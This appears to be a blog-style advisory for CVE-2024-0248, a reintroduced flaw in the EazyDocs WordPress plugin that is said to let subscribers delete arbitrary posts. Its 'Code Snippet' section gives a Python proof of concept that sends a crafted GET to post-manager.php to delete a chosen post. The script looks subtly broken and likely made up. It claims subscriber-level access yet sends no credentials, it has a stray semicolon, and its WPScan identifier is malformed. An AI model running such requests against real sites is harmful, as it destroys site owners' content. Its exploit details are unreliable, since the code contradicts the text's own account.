CVE-2024-0248: Reintroduction of Arbitrary Post Deletion and Document Manipulation Vulnerability in EazyDocs WordPress Plugin

The EazyDocs WordPress plugin, a popular tool used to manage and organize documentation for various projects, has reintroduced a vulnerability, CVE-2023-6029 (https://wpscan.com/vulnerability/7aaaf85-813-4fd7-8f09-f8edc929597e/), that was previously patched. This vulnerability allowed any authenticated user, even those with subscriber roles, to delete arbitrary posts and manipulate documents and sections. This issue was partially fixed in version 2.3.9 of EazyDocs but still poses a significant risk to users who fail to update their plugin.

Details of the Exploit

The vulnerability was reintroduced in EazyDocs version 2.3.8, thereby allowing unauthorized users to delete arbitrary posts and manipulate documents/sections within the plugin. The exploit can be executed by simply sending a crafted HTTP request to the target website.

Code Snippet

The following is a simple code snippet showing how an attacker can exploit this vulnerability using a crafted HTTP request:

import requests

TARGET_URL = 'http://example.com';
PLUGIN_DIR = '/wp-content/plugins/eazydocs'
DOCUMENT_ID = 1
POST_ID = 1

# Forged request to delete arbitrary post
DELETE_POST_URL = f'{TARGET_URL}{PLUGIN_DIR}/post-manager.php?action=delete_post&document_id={DOCUMENT_ID}&post_id={POST_ID}'
response = requests.get(DELETE_POST_URL)

if response.status_code == 200:
    print("Post deleted successfully!")
else:
    print("Failed to delete the post.")

This code sends a GET request to the plugin's post-manager.php file with the action delete_post and the arbitrary document and post ID to be deleted. The script ultimately deletes the specified post, even if the attacker has only subscriber-level permissions.

Original References

- CVE-2023-6029: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6029
- WPScan Vulnerability Details: https://wpscan.com/vulnerability/7aaaf85-813-4fd7-8f09-f8edc929597e/

Partial Fix in Version 2.3.9

The vulnerability was partially fixed in EazyDocs version 2.3.9. However, it is essential to remain cautious and keep the plugin updated to ensure the security of your WordPress site.

Recommended Actions

Users running the EazyDocs plugin version 2.3.8 are urged to update to version 2.3.9 or later immediately. It is also essential to subscribe to plugin update notifications and ensure the continual security of your site. Always remember that keeping plugins up-to-date can significantly reduce your vulnerability to exploits and security breaches.

Timeline

Published on: 02/12/2024 16:15:08 UTC
Last modified on: 02/12/2024 17:31:21 UTC